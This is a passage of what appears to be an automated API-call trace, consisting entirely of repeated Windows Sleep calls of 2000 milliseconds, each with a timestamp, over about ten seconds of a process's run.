Sleep (dwMilliseconds=0x7d0) [0180.870] Sleep (dwMilliseconds=0x7d0) [0180.887] Sleep (dwMilliseconds=0x7d0) [0180.917] Sleep (dwMilliseconds=0x7d0) [0180.942] Sleep (dwMilliseconds=0x7d0) [0180.948] Sleep (dwMilliseconds=0x7d0) [0180.963] Sleep (dwMilliseconds=0x7d0) [0180.979] Sleep (dwMilliseconds=0x7d0) [0180.996] Sleep (dwMilliseconds=0x7d0) [0181.010] Sleep (dwMilliseconds=0x7d0) [0181.026] Sleep (dwMilliseconds=0x7d0) [0181.052] Sleep (dwMilliseconds=0x7d0) [0181.057] Sleep (dwMilliseconds=0x7d0) [0181.073] Sleep (dwMilliseconds=0x7d0) [0181.088] Sleep (dwMilliseconds=0x7d0) [0181.124] Sleep (dwMilliseconds=0x7d0) [0181.136] Sleep (dwMilliseconds=0x7d0) [0181.151] Sleep (dwMilliseconds=0x7d0) [0181.166] Sleep (dwMilliseconds=0x7d0) [0181.182] Sleep (dwMilliseconds=0x7d0) [0181.197] Sleep (dwMilliseconds=0x7d0) [0181.213] Sleep (dwMilliseconds=0x7d0) [0181.230] Sleep (dwMilliseconds=0x7d0) [0181.249] Sleep (dwMilliseconds=0x7d0) [0181.260] Sleep (dwMilliseconds=0x7d0) [0181.275] Sleep (dwMilliseconds=0x7d0) [0181.291] Sleep (dwMilliseconds=0x7d0) [0181.307] Sleep (dwMilliseconds=0x7d0) [0181.322] Sleep (dwMilliseconds=0x7d0) [0181.339] Sleep (dwMilliseconds=0x7d0) [0181.353] Sleep (dwMilliseconds=0x7d0) [0181.370] Sleep (dwMilliseconds=0x7d0) [0181.385] Sleep (dwMilliseconds=0x7d0) [0181.401] Sleep (dwMilliseconds=0x7d0) [0181.416] Sleep (dwMilliseconds=0x7d0) [0181.432] Sleep (dwMilliseconds=0x7d0) [0181.449] Sleep (dwMilliseconds=0x7d0) [0181.463] Sleep (dwMilliseconds=0x7d0) [0181.478] Sleep (dwMilliseconds=0x7d0) [0181.494] Sleep (dwMilliseconds=0x7d0) [0181.509] Sleep (dwMilliseconds=0x7d0) [0181.526] Sleep (dwMilliseconds=0x7d0) [0181.543] Sleep (dwMilliseconds=0x7d0) [0181.557] Sleep (dwMilliseconds=0x7d0) [0181.572] Sleep (dwMilliseconds=0x7d0) [0181.588] Sleep (dwMilliseconds=0x7d0) [0181.603] Sleep (dwMilliseconds=0x7d0) [0181.619] Sleep (dwMilliseconds=0x7d0) [0181.634] Sleep (dwMilliseconds=0x7d0) [0181.650] Sleep (dwMilliseconds=0x7d0) [0181.666] Sleep (dwMilliseconds=0x7d0) [0181.681] Sleep (dwMilliseconds=0x7d0) [0181.697] Sleep (dwMilliseconds=0x7d0) [0181.712] Sleep (dwMilliseconds=0x7d0) [0181.728] Sleep (dwMilliseconds=0x7d0) [0181.743] Sleep (dwMilliseconds=0x7d0) [0181.759] Sleep (dwMilliseconds=0x7d0) [0181.780] Sleep (dwMilliseconds=0x7d0) [0181.790] Sleep (dwMilliseconds=0x7d0) [0181.806] Sleep (dwMilliseconds=0x7d0) [0181.822] Sleep (dwMilliseconds=0x7d0) [0181.837] Sleep (dwMilliseconds=0x7d0) [0181.853] Sleep (dwMilliseconds=0x7d0) [0181.871] Sleep (dwMilliseconds=0x7d0) [0181.886] Sleep (dwMilliseconds=0x7d0) [0181.901] Sleep (dwMilliseconds=0x7d0) [0181.917] Sleep (dwMilliseconds=0x7d0) [0181.951] Sleep (dwMilliseconds=0x7d0) [0181.971] Sleep (dwMilliseconds=0x7d0) [0182.005] Sleep (dwMilliseconds=0x7d0) [0182.024] Sleep (dwMilliseconds=0x7d0) [0182.066] Sleep (dwMilliseconds=0x7d0) [0182.071] Sleep (dwMilliseconds=0x7d0) [0182.087] Sleep (dwMilliseconds=0x7d0) [0182.130] Sleep (dwMilliseconds=0x7d0) [0182.135] Sleep (dwMilliseconds=0x7d0) [0182.149] Sleep (dwMilliseconds=0x7d0) [0182.164] Sleep (dwMilliseconds=0x7d0) [0182.180] Sleep (dwMilliseconds=0x7d0) [0182.196] Sleep (dwMilliseconds=0x7d0) [0182.212] Sleep (dwMilliseconds=0x7d0) [0182.227] Sleep (dwMilliseconds=0x7d0) [0182.244] Sleep (dwMilliseconds=0x7d0) [0182.258] Sleep (dwMilliseconds=0x7d0) [0182.274] Sleep (dwMilliseconds=0x7d0) [0182.289] Sleep (dwMilliseconds=0x7d0) [0182.312] Sleep (dwMilliseconds=0x7d0) [0182.321] Sleep (dwMilliseconds=0x7d0) [0182.336] Sleep (dwMilliseconds=0x7d0) [0182.353] Sleep (dwMilliseconds=0x7d0) [0182.367] Sleep (dwMilliseconds=0x7d0) [0182.383] Sleep (dwMilliseconds=0x7d0) [0182.399] Sleep (dwMilliseconds=0x7d0) [0182.414] Sleep (dwMilliseconds=0x7d0) [0182.430] Sleep (dwMilliseconds=0x7d0) [0182.445] Sleep (dwMilliseconds=0x7d0) [0182.462] Sleep (dwMilliseconds=0x7d0) [0182.477] Sleep (dwMilliseconds=0x7d0) [0182.492] Sleep (dwMilliseconds=0x7d0) [0182.508] Sleep (dwMilliseconds=0x7d0) [0182.574] Sleep (dwMilliseconds=0x7d0) [0182.586] Sleep (dwMilliseconds=0x7d0) [0182.601] Sleep (dwMilliseconds=0x7d0) [0182.617] Sleep (dwMilliseconds=0x7d0) [0182.633] Sleep (dwMilliseconds=0x7d0) [0182.648] Sleep (dwMilliseconds=0x7d0) [0182.664] Sleep (dwMilliseconds=0x7d0) [0182.681] Sleep (dwMilliseconds=0x7d0) [0182.695] Sleep (dwMilliseconds=0x7d0) [0182.711] Sleep (dwMilliseconds=0x7d0) [0182.726] Sleep (dwMilliseconds=0x7d0) [0182.742] Sleep (dwMilliseconds=0x7d0) [0182.757] Sleep (dwMilliseconds=0x7d0) [0182.773] Sleep (dwMilliseconds=0x7d0) [0182.795] Sleep (dwMilliseconds=0x7d0) [0182.816] Sleep (dwMilliseconds=0x7d0) [0182.820] Sleep (dwMilliseconds=0x7d0) [0182.836] Sleep (dwMilliseconds=0x7d0) [0182.851] Sleep (dwMilliseconds=0x7d0) [0182.872] Sleep (dwMilliseconds=0x7d0) [0182.882] Sleep (dwMilliseconds=0x7d0) [0182.923] Sleep (dwMilliseconds=0x7d0) [0182.929] Sleep (dwMilliseconds=0x7d0) [0182.972] Sleep (dwMilliseconds=0x7d0) [0182.976] Sleep (dwMilliseconds=0x7d0) [0182.991] Sleep (dwMilliseconds=0x7d0) [0183.009] Sleep (dwMilliseconds=0x7d0) [0183.028] Sleep (dwMilliseconds=0x7d0) [0183.048] Sleep (dwMilliseconds=0x7d0) [0183.072] Sleep (dwMilliseconds=0x7d0) [0183.085] Sleep (dwMilliseconds=0x7d0) [0183.105] Sleep (dwMilliseconds=0x7d0) [0183.117] Sleep (dwMilliseconds=0x7d0) [0183.133] Sleep (dwMilliseconds=0x7d0) [0183.174] Sleep (dwMilliseconds=0x7d0) [0183.179] Sleep (dwMilliseconds=0x7d0) [0183.194] Sleep (dwMilliseconds=0x7d0) [0183.210] Sleep (dwMilliseconds=0x7d0) [0183.229] Sleep (dwMilliseconds=0x7d0) [0183.242] Sleep (dwMilliseconds=0x7d0) [0183.259] Sleep (dwMilliseconds=0x7d0) [0183.273] Sleep (dwMilliseconds=0x7d0) [0183.288] Sleep (dwMilliseconds=0x7d0) [0183.309] Sleep (dwMilliseconds=0x7d0) [0183.319] Sleep (dwMilliseconds=0x7d0) [0183.335] Sleep (dwMilliseconds=0x7d0) [0183.353] Sleep (dwMilliseconds=0x7d0) [0183.371] Sleep (dwMilliseconds=0x7d0) [0183.382] Sleep (dwMilliseconds=0x7d0) [0183.397] Sleep (dwMilliseconds=0x7d0) [0183.419] Sleep (dwMilliseconds=0x7d0) [0183.430] Sleep (dwMilliseconds=0x7d0) [0183.445] Sleep (dwMilliseconds=0x7d0) [0183.461] Sleep (dwMilliseconds=0x7d0) [0183.482] Sleep (dwMilliseconds=0x7d0) [0183.491] Sleep (dwMilliseconds=0x7d0) [0183.506] Sleep (dwMilliseconds=0x7d0) [0183.522] Sleep (dwMilliseconds=0x7d0) [0183.538] Sleep (dwMilliseconds=0x7d0) [0183.558] Sleep (dwMilliseconds=0x7d0) [0183.570] Sleep (dwMilliseconds=0x7d0) [0183.585] Sleep (dwMilliseconds=0x7d0) [0183.600] Sleep (dwMilliseconds=0x7d0) [0183.620] Sleep (dwMilliseconds=0x7d0) [0183.631] Sleep (dwMilliseconds=0x7d0) [0183.647] Sleep (dwMilliseconds=0x7d0) [0183.663] Sleep (dwMilliseconds=0x7d0) [0183.680] Sleep (dwMilliseconds=0x7d0) [0183.699] Sleep (dwMilliseconds=0x7d0) [0183.709] Sleep (dwMilliseconds=0x7d0) [0183.725] Sleep (dwMilliseconds=0x7d0) [0183.740] Sleep (dwMilliseconds=0x7d0) [0183.761] Sleep (dwMilliseconds=0x7d0) [0183.772] Sleep (dwMilliseconds=0x7d0) [0183.789] Sleep (dwMilliseconds=0x7d0) [0183.804] Sleep (dwMilliseconds=0x7d0) [0183.824] Sleep (dwMilliseconds=0x7d0) [0183.834] Sleep (dwMilliseconds=0x7d0) [0183.850] Sleep (dwMilliseconds=0x7d0) [0183.865] Sleep (dwMilliseconds=0x7d0) [0183.881] Sleep (dwMilliseconds=0x7d0) [0183.903] Sleep (dwMilliseconds=0x7d0) [0183.912] Sleep (dwMilliseconds=0x7d0) [0183.928] Sleep (dwMilliseconds=0x7d0) [0183.962] Sleep (dwMilliseconds=0x7d0) [0183.985] Sleep (dwMilliseconds=0x7d0) [0183.990] Sleep (dwMilliseconds=0x7d0) [0184.007] Sleep (dwMilliseconds=0x7d0) [0184.026] Sleep (dwMilliseconds=0x7d0) [0184.037] Sleep (dwMilliseconds=0x7d0) [0184.077] Sleep (dwMilliseconds=0x7d0) [0184.084] Sleep (dwMilliseconds=0x7d0) [0184.109] Sleep (dwMilliseconds=0x7d0) [0184.115] Sleep (dwMilliseconds=0x7d0) [0184.130] Sleep (dwMilliseconds=0x7d0) [0184.171] Sleep (dwMilliseconds=0x7d0) [0184.177] Sleep (dwMilliseconds=0x7d0) [0184.193] Sleep (dwMilliseconds=0x7d0) [0184.209] Sleep (dwMilliseconds=0x7d0) [0184.229] Sleep (dwMilliseconds=0x7d0) [0184.239] Sleep (dwMilliseconds=0x7d0) [0184.255] Sleep (dwMilliseconds=0x7d0) [0184.271] Sleep (dwMilliseconds=0x7d0) [0184.286] Sleep (dwMilliseconds=0x7d0) [0184.307] Sleep (dwMilliseconds=0x7d0) [0184.319] Sleep (dwMilliseconds=0x7d0) [0184.334] Sleep (dwMilliseconds=0x7d0) [0184.349] Sleep (dwMilliseconds=0x7d0) [0184.369] Sleep (dwMilliseconds=0x7d0) [0184.380] Sleep (dwMilliseconds=0x7d0) [0184.395] Sleep (dwMilliseconds=0x7d0) [0184.411] Sleep (dwMilliseconds=0x7d0) [0184.435] Sleep (dwMilliseconds=0x7d0) [0184.443] Sleep (dwMilliseconds=0x7d0) [0184.458] Sleep (dwMilliseconds=0x7d0) [0184.474] Sleep (dwMilliseconds=0x7d0) [0184.489] Sleep (dwMilliseconds=0x7d0) [0184.509] Sleep (dwMilliseconds=0x7d0) [0184.520] Sleep (dwMilliseconds=0x7d0) [0184.537] Sleep (dwMilliseconds=0x7d0) [0184.552] Sleep (dwMilliseconds=0x7d0) [0184.572] Sleep (dwMilliseconds=0x7d0) [0184.583] Sleep (dwMilliseconds=0x7d0) [0184.598] Sleep (dwMilliseconds=0x7d0) [0184.614] Sleep (dwMilliseconds=0x7d0) [0184.630] Sleep (dwMilliseconds=0x7d0) [0184.651] Sleep (dwMilliseconds=0x7d0) [0184.663] Sleep (dwMilliseconds=0x7d0) [0184.676] Sleep (dwMilliseconds=0x7d0) [0184.696] Sleep (dwMilliseconds=0x7d0) [0184.756] Sleep (dwMilliseconds=0x7d0) [0184.774] Sleep (dwMilliseconds=0x7d0) [0184.788] Sleep (dwMilliseconds=0x7d0) [0184.801] Sleep (dwMilliseconds=0x7d0) [0184.817] Sleep (dwMilliseconds=0x7d0) [0184.833] Sleep (dwMilliseconds=0x7d0) [0184.871] Sleep (dwMilliseconds=0x7d0) [0184.879] Sleep (dwMilliseconds=0x7d0) [0184.895] Sleep (dwMilliseconds=0x7d0) [0184.910] Sleep (dwMilliseconds=0x7d0) [0184.930] Sleep (dwMilliseconds=0x7d0) [0184.951] Sleep (dwMilliseconds=0x7d0) [0184.961] Sleep (dwMilliseconds=0x7d0) [0184.974] Sleep (dwMilliseconds=0x7d0) [0184.988] Sleep (dwMilliseconds=0x7d0) [0185.004] Sleep (dwMilliseconds=0x7d0) [0185.027] Sleep (dwMilliseconds=0x7d0) [0185.035] Sleep (dwMilliseconds=0x7d0) [0185.058] Sleep (dwMilliseconds=0x7d0) [0185.078] Sleep (dwMilliseconds=0x7d0) [0185.082] Sleep (dwMilliseconds=0x7d0) [0185.097] Sleep (dwMilliseconds=0x7d0) [0185.117] Sleep (dwMilliseconds=0x7d0) [0185.130] Sleep (dwMilliseconds=0x7d0) [0185.166] Sleep (dwMilliseconds=0x7d0) [0185.180] Sleep (dwMilliseconds=0x7d0) [0185.191] Sleep (dwMilliseconds=0x7d0) [0185.207] Sleep (dwMilliseconds=0x7d0) [0185.222] Sleep (dwMilliseconds=0x7d0) [0185.238] Sleep (dwMilliseconds=0x7d0) [0185.258] Sleep (dwMilliseconds=0x7d0) [0185.269] Sleep (dwMilliseconds=0x7d0) [0185.286] Sleep (dwMilliseconds=0x7d0) [0185.301] Sleep (dwMilliseconds=0x7d0) [0185.321] Sleep (dwMilliseconds=0x7d0) [0185.332] Sleep (dwMilliseconds=0x7d0) [0185.347] Sleep (dwMilliseconds=0x7d0) [0185.363] Sleep (dwMilliseconds=0x7d0) [0185.378] Sleep (dwMilliseconds=0x7d0) [0185.400] Sleep (dwMilliseconds=0x7d0) [0185.410] Sleep (dwMilliseconds=0x7d0) [0185.425] Sleep (dwMilliseconds=0x7d0) [0185.441] Sleep (dwMilliseconds=0x7d0) [0185.461] Sleep (dwMilliseconds=0x7d0) [0185.472] Sleep (dwMilliseconds=0x7d0) [0185.488] Sleep (dwMilliseconds=0x7d0) [0185.504] Sleep (dwMilliseconds=0x7d0) [0185.525] Sleep (dwMilliseconds=0x7d0) [0185.534] Sleep (dwMilliseconds=0x7d0) [0185.550] Sleep (dwMilliseconds=0x7d0) [0185.566] Sleep (dwMilliseconds=0x7d0) [0185.586] Sleep (dwMilliseconds=0x7d0) [0185.597] Sleep (dwMilliseconds=0x7d0) [0185.614] Sleep (dwMilliseconds=0x7d0) [0185.628] Sleep (dwMilliseconds=0x7d0) [0185.652] Sleep (dwMilliseconds=0x7d0) [0185.659] Sleep (dwMilliseconds=0x7d0) [0185.675] Sleep (dwMilliseconds=0x7d0) [0185.691] Sleep (dwMilliseconds=0x7d0) [0185.714] Sleep (dwMilliseconds=0x7d0) [0185.721] Sleep (dwMilliseconds=0x7d0) [0185.737] Sleep (dwMilliseconds=0x7d0) [0185.753] Sleep (dwMilliseconds=0x7d0) [0185.772] Sleep (dwMilliseconds=0x7d0) [0185.784] Sleep (dwMilliseconds=0x7d0) [0185.800] Sleep (dwMilliseconds=0x7d0) [0185.816] Sleep (dwMilliseconds=0x7d0) [0185.831] Sleep (dwMilliseconds=0x7d0) [0185.851] Sleep (dwMilliseconds=0x7d0) [0185.867] Sleep (dwMilliseconds=0x7d0) [0185.878] Sleep (dwMilliseconds=0x7d0) [0185.893] Sleep (dwMilliseconds=0x7d0) [0185.914] Sleep (dwMilliseconds=0x7d0) [0185.926] Sleep (dwMilliseconds=0x7d0) [0185.940] Sleep (dwMilliseconds=0x7d0) [0185.988] Sleep (dwMilliseconds=0x7d0) [0186.002] Sleep (dwMilliseconds=0x7d0) [0186.023] Sleep (dwMilliseconds=0x7d0) [0186.036] Sleep (dwMilliseconds=0x7d0) [0186.063] Sleep (dwMilliseconds=0x7d0) [0186.122] Sleep (dwMilliseconds=0x7d0) [0186.127] Sleep (dwMilliseconds=0x7d0) [0186.166] Sleep (dwMilliseconds=0x7d0) [0186.174] Sleep (dwMilliseconds=0x7d0) [0186.190] Sleep (dwMilliseconds=0x7d0) [0186.205] Sleep (dwMilliseconds=0x7d0) [0186.224] Sleep (dwMilliseconds=0x7d0) [0186.236] Sleep (dwMilliseconds=0x7d0) [0186.252] Sleep (dwMilliseconds=0x7d0) [0186.269] Sleep (dwMilliseconds=0x7d0) [0186.283] Sleep (dwMilliseconds=0x7d0) [0186.303] Sleep (dwMilliseconds=0x7d0) [0186.314] Sleep (dwMilliseconds=0x7d0) [0186.330] Sleep (dwMilliseconds=0x7d0) [0186.346] Sleep (dwMilliseconds=0x7d0) [0186.365] Sleep (dwMilliseconds=0x7d0) [0186.378] Sleep (dwMilliseconds=0x7d0) [0186.392] Sleep (dwMilliseconds=0x7d0) [0186.408] Sleep (dwMilliseconds=0x7d0) [0186.428] Sleep (dwMilliseconds=0x7d0) [0186.440] Sleep (dwMilliseconds=0x7d0) [0186.455] Sleep (dwMilliseconds=0x7d0) [0186.470] Sleep (dwMilliseconds=0x7d0) [0186.488] Sleep (dwMilliseconds=0x7d0) [0186.509] Sleep (dwMilliseconds=0x7d0) [0186.517] Sleep (dwMilliseconds=0x7d0) [0186.533] Sleep (dwMilliseconds=0x7d0) [0186.549] Sleep (dwMilliseconds=0x7d0) [0186.570] Sleep (dwMilliseconds=0x7d0) [0186.580] Sleep (dwMilliseconds=0x7d0) [0186.596] Sleep (dwMilliseconds=0x7d0) [0186.701] Sleep (dwMilliseconds=0x7d0) [0186.704] Sleep (dwMilliseconds=0x7d0) [0186.720] Sleep (dwMilliseconds=0x7d0) [0186.736] Sleep (dwMilliseconds=0x7d0) [0186.759] Sleep (dwMilliseconds=0x7d0) [0186.767] Sleep (dwMilliseconds=0x7d0) [0186.782] Sleep (dwMilliseconds=0x7d0) [0186.799] Sleep (dwMilliseconds=0x7d0) [0186.817] Sleep (dwMilliseconds=0x7d0) [0186.829] Sleep (dwMilliseconds=0x7d0) [0186.845] Sleep (dwMilliseconds=0x7d0) [0186.860] Sleep (dwMilliseconds=0x7d0) [0186.880] Sleep (dwMilliseconds=0x7d0) [0186.891] Sleep (dwMilliseconds=0x7d0) [0186.908] Sleep (dwMilliseconds=0x7d0) [0186.923] Sleep (dwMilliseconds=0x7d0) [0186.938] Sleep (dwMilliseconds=0x7d0) [0186.961] Sleep (dwMilliseconds=0x7d0) [0187.027] Sleep (dwMilliseconds=0x7d0) [0187.032] Sleep (dwMilliseconds=0x7d0) [0187.048] Sleep (dwMilliseconds=0x7d0) [0187.074] Sleep (dwMilliseconds=0x7d0) [0187.080] Sleep (dwMilliseconds=0x7d0) [0187.098] Sleep (dwMilliseconds=0x7d0) [0187.133] Sleep (dwMilliseconds=0x7d0) [0187.164] Sleep (dwMilliseconds=0x7d0) [0187.172] Sleep (dwMilliseconds=0x7d0) [0187.192] Sleep (dwMilliseconds=0x7d0) [0187.204] Sleep (dwMilliseconds=0x7d0) [0187.219] Sleep (dwMilliseconds=0x7d0) [0187.236] Sleep (dwMilliseconds=0x7d0) [0187.255] Sleep (dwMilliseconds=0x7d0) [0187.266] Sleep (dwMilliseconds=0x7d0) [0187.282] Sleep (dwMilliseconds=0x7d0) [0187.297] Sleep (dwMilliseconds=0x7d0) [0187.322] Sleep (dwMilliseconds=0x7d0) [0187.329] Sleep (dwMilliseconds=0x7d0) [0187.345] Sleep (dwMilliseconds=0x7d0) [0187.360] Sleep (dwMilliseconds=0x7d0) [0187.382] Sleep (dwMilliseconds=0x7d0) [0187.391] Sleep (dwMilliseconds=0x7d0) [0187.406] Sleep (dwMilliseconds=0x7d0) [0187.422] Sleep (dwMilliseconds=0x7d0) [0187.438] Sleep (dwMilliseconds=0x7d0) [0187.459] Sleep (dwMilliseconds=0x7d0) [0187.469] Sleep (dwMilliseconds=0x7d0) [0187.484] Sleep (dwMilliseconds=0x7d0) [0187.500] Sleep (dwMilliseconds=0x7d0) [0187.520] Sleep (dwMilliseconds=0x7d0) [0187.531] Sleep (dwMilliseconds=0x7d0) [0187.547] Sleep (dwMilliseconds=0x7d0) [0187.563] Sleep (dwMilliseconds=0x7d0) [0187.578] Sleep (dwMilliseconds=0x7d0) [0187.600] Sleep (dwMilliseconds=0x7d0) [0187.612] Sleep (dwMilliseconds=0x7d0) [0187.625] Sleep (dwMilliseconds=0x7d0) [0187.641] Sleep (dwMilliseconds=0x7d0) [0187.664] Sleep (dwMilliseconds=0x7d0) [0187.671] Sleep (dwMilliseconds=0x7d0) [0187.687] Sleep (dwMilliseconds=0x7d0) [0187.703] Sleep (dwMilliseconds=0x7d0) [0187.726] Sleep (dwMilliseconds=0x7d0) [0187.734] Sleep (dwMilliseconds=0x7d0) [0187.750] Sleep (dwMilliseconds=0x7d0) [0187.766] Sleep (dwMilliseconds=0x7d0) [0187.781] Sleep (dwMilliseconds=0x7d0) [0187.803] Sleep (dwMilliseconds=0x7d0) [0187.812] Sleep (dwMilliseconds=0x7d0) [0187.828] Sleep (dwMilliseconds=0x7d0) [0187.843] Sleep (dwMilliseconds=0x7d0) [0187.863] Sleep (dwMilliseconds=0x7d0) [0187.995] Sleep (dwMilliseconds=0x7d0) [0187.999] Sleep (dwMilliseconds=0x7d0) [0188.026] Sleep (dwMilliseconds=0x7d0) [0188.030] Sleep (dwMilliseconds=0x7d0) [0188.047] Sleep (dwMilliseconds=0x7d0) [0188.062] Sleep (dwMilliseconds=0x7d0) [0188.078] Sleep (dwMilliseconds=0x7d0) [0188.101] Sleep (dwMilliseconds=0x7d0) [0188.108] Sleep (dwMilliseconds=0x7d0) [0188.143] Sleep (dwMilliseconds=0x7d0) [0188.160] Sleep (dwMilliseconds=0x7d0) [0188.171] Sleep (dwMilliseconds=0x7d0) [0188.186] Sleep (dwMilliseconds=0x7d0) [0188.204] Sleep (dwMilliseconds=0x7d0) [0188.227] Sleep (dwMilliseconds=0x7d0) [0188.233] Sleep (dwMilliseconds=0x7d0) [0188.268] Sleep (dwMilliseconds=0x7d0) [0188.280] Sleep (dwMilliseconds=0x7d0) [0188.303] Sleep (dwMilliseconds=0x7d0) [0188.311] Sleep (dwMilliseconds=0x7d0) [0188.327] Sleep (dwMilliseconds=0x7d0) [0188.350] Sleep (dwMilliseconds=0x7d0) [0188.358] Sleep (dwMilliseconds=0x7d0) [0188.374] Sleep (dwMilliseconds=0x7d0) [0188.389] Sleep (dwMilliseconds=0x7d0) [0188.409] Sleep (dwMilliseconds=0x7d0) [0188.420] Sleep (dwMilliseconds=0x7d0) [0188.436] Sleep (dwMilliseconds=0x7d0) [0188.452] Sleep (dwMilliseconds=0x7d0) [0188.477] Sleep (dwMilliseconds=0x7d0) [0188.483] Sleep (dwMilliseconds=0x7d0) [0188.498] Sleep (dwMilliseconds=0x7d0) [0188.516] Sleep (dwMilliseconds=0x7d0) [0188.530] Sleep (dwMilliseconds=0x7d0) [0188.556] Sleep (dwMilliseconds=0x7d0) [0188.561] Sleep (dwMilliseconds=0x7d0) [0188.576] Sleep (dwMilliseconds=0x7d0) [0188.592] Sleep (dwMilliseconds=0x7d0) [0188.612] Sleep (dwMilliseconds=0x7d0) [0188.625] Sleep (dwMilliseconds=0x7d0) [0188.639] Sleep (dwMilliseconds=0x7d0) [0188.658] Sleep (dwMilliseconds=0x7d0) [0188.676] Sleep (dwMilliseconds=0x7d0) [0188.685] Sleep (dwMilliseconds=0x7d0) [0188.701] Sleep (dwMilliseconds=0x7d0) [0188.717] Sleep (dwMilliseconds=0x7d0) [0188.734] Sleep (dwMilliseconds=0x7d0) [0188.773] Sleep (dwMilliseconds=0x7d0) [0188.779] Sleep (dwMilliseconds=0x7d0) [0188.795] Sleep (dwMilliseconds=0x7d0) [0188.810] Sleep (dwMilliseconds=0x7d0) [0188.826] Sleep (dwMilliseconds=0x7d0) [0188.847] Sleep (dwMilliseconds=0x7d0) [0188.857] Sleep (dwMilliseconds=0x7d0) [0188.873] Sleep (dwMilliseconds=0x7d0) [0188.893] Sleep (dwMilliseconds=0x7d0) [0188.904] Sleep (dwMilliseconds=0x7d0) [0188.920] Sleep (dwMilliseconds=0x7d0) [0188.935] Sleep (dwMilliseconds=0x7d0) [0188.961] Sleep (dwMilliseconds=0x7d0) [0188.966] Sleep (dwMilliseconds=0x7d0) [0188.982] Sleep (dwMilliseconds=0x7d0) [0188.998] Sleep (dwMilliseconds=0x7d0) [0189.029] Sleep (dwMilliseconds=0x7d0) [0189.048] Sleep (dwMilliseconds=0x7d0) [0189.061] Sleep (dwMilliseconds=0x7d0) [0189.082] Sleep (dwMilliseconds=0x7d0) [0189.091] Sleep (dwMilliseconds=0x7d0) [0189.108] Sleep (dwMilliseconds=0x7d0) [0189.122] Sleep (dwMilliseconds=0x7d0) [0189.153] Sleep (dwMilliseconds=0x7d0) [0189.154] Sleep (dwMilliseconds=0x7d0) [0189.171] Sleep (dwMilliseconds=0x7d0) [0189.185] Sleep (dwMilliseconds=0x7d0) [0189.207] Sleep (dwMilliseconds=0x7d0) [0189.216] Sleep (dwMilliseconds=0x7d0) [0189.232] Sleep (dwMilliseconds=0x7d0) [0189.283] Sleep (dwMilliseconds=0x7d0) [0189.294] Sleep (dwMilliseconds=0x7d0) [0189.310] Sleep (dwMilliseconds=0x7d0) [0189.325] Sleep (dwMilliseconds=0x7d0) [0189.348] Sleep (dwMilliseconds=0x7d0) [0189.356] Sleep (dwMilliseconds=0x7d0) [0189.372] Sleep (dwMilliseconds=0x7d0) [0189.389] Sleep (dwMilliseconds=0x7d0) [0189.481] Sleep (dwMilliseconds=0x7d0) [0189.497] Sleep (dwMilliseconds=0x7d0) [0189.512] Sleep (dwMilliseconds=0x7d0) [0189.528] Sleep (dwMilliseconds=0x7d0) [0189.547] Sleep (dwMilliseconds=0x7d0) [0189.559] Sleep (dwMilliseconds=0x7d0) [0189.575] Sleep (dwMilliseconds=0x7d0) [0189.593] Sleep (dwMilliseconds=0x7d0) [0189.610] Sleep (dwMilliseconds=0x7d0) [0189.621] Sleep (dwMilliseconds=0x7d0) [0189.637] Sleep (dwMilliseconds=0x7d0) [0189.653] Sleep (dwMilliseconds=0x7d0) [0189.668] Sleep (dwMilliseconds=0x7d0) [0189.692] Sleep (dwMilliseconds=0x7d0) [0189.699] Sleep (dwMilliseconds=0x7d0) [0189.715] Sleep (dwMilliseconds=0x7d0) [0189.733] Sleep (dwMilliseconds=0x7d0) [0189.751] Sleep (dwMilliseconds=0x7d0) [0189.762] Sleep (dwMilliseconds=0x7d0) [0189.778] Sleep (dwMilliseconds=0x7d0) [0189.795] Sleep (dwMilliseconds=0x7d0) [0189.813] Sleep (dwMilliseconds=0x7d0) [0189.824] Sleep (dwMilliseconds=0x7d0) [0189.843] Sleep (dwMilliseconds=0x7d0) [0189.856] Sleep (dwMilliseconds=0x7d0) [0189.871] Sleep (dwMilliseconds=0x7d0) [0189.895] Sleep (dwMilliseconds=0x7d0) [0190.027] Sleep (dwMilliseconds=0x7d0) [0190.054] Sleep (dwMilliseconds=0x7d0) [0190.058] Sleep (dwMilliseconds=0x7d0) [0190.074] Sleep (dwMilliseconds=0x7d0) [0190.090] Sleep (dwMilliseconds=0x7d0) [0190.110] Sleep (dwMilliseconds=0x7d0) [0190.121] Sleep (dwMilliseconds=0x7d0) [0190.138] Sleep (dwMilliseconds=0x7d0) [0190.152] Sleep (dwMilliseconds=0x7d0) [0190.167] Sleep (dwMilliseconds=0x7d0) [0190.187] Sleep (dwMilliseconds=0x7d0) [0190.199] Sleep (dwMilliseconds=0x7d0) [0190.214] Sleep (dwMilliseconds=0x7d0) [0190.230] Sleep (dwMilliseconds=0x7d0) [0190.253] Sleep (dwMilliseconds=0x7d0) [0190.261] Sleep (dwMilliseconds=0x7d0) [0190.280] Sleep (dwMilliseconds=0x7d0) [0190.292] Sleep (dwMilliseconds=0x7d0) [0190.315] Sleep (dwMilliseconds=0x7d0) [0190.323] Sleep (dwMilliseconds=0x7d0) [0190.358] Sleep (dwMilliseconds=0x7d0) [0190.370] Sleep (dwMilliseconds=0x7d0) [0190.390] Sleep (dwMilliseconds=0x7d0) [0190.402] Sleep (dwMilliseconds=0x7d0) [0190.417] Sleep (dwMilliseconds=0x7d0) [0190.433] Sleep (dwMilliseconds=0x7d0) [0190.457] Sleep (dwMilliseconds=0x7d0) [0190.464] Sleep (dwMilliseconds=0x7d0) [0190.480] Sleep (dwMilliseconds=0x7d0) [0190.495] Sleep (dwMilliseconds=0x7d0) [0190.517] Sleep (dwMilliseconds=0x7d0) [0190.526] Sleep (dwMilliseconds=0x7d0) [0190.542] Sleep (dwMilliseconds=0x7d0) [0190.559] Sleep (dwMilliseconds=0x7d0) [0190.579] Sleep (dwMilliseconds=0x7d0) [0190.589] Sleep (dwMilliseconds=0x7d0) [0190.604] Sleep (dwMilliseconds=0x7d0) [0190.620] Sleep (dwMilliseconds=0x7d0) [0190.642] Sleep (dwMilliseconds=0x7d0) [0190.651] Sleep (dwMilliseconds=0x7d0) [0190.668] Sleep (dwMilliseconds=0x7d0) [0190.682] Sleep (dwMilliseconds=0x7d0) [0190.703] Sleep (dwMilliseconds=0x7d0) [0190.714] Sleep (dwMilliseconds=0x7d0) [0190.729] Sleep (dwMilliseconds=0x7d0) [0190.746] Sleep (dwMilliseconds=0x7d0) [0190.769] Sleep (dwMilliseconds=0x7d0) [0190.779] Sleep (dwMilliseconds=0x7d0) [0190.792] Sleep (dwMilliseconds=0x7d0) [0190.807] Sleep (dwMilliseconds=0x7d0) [0190.823] Sleep (dwMilliseconds=0x7d0) [0190.844] Sleep (dwMilliseconds=0x7d0) [0190.854] Sleep (dwMilliseconds=0x7d0) 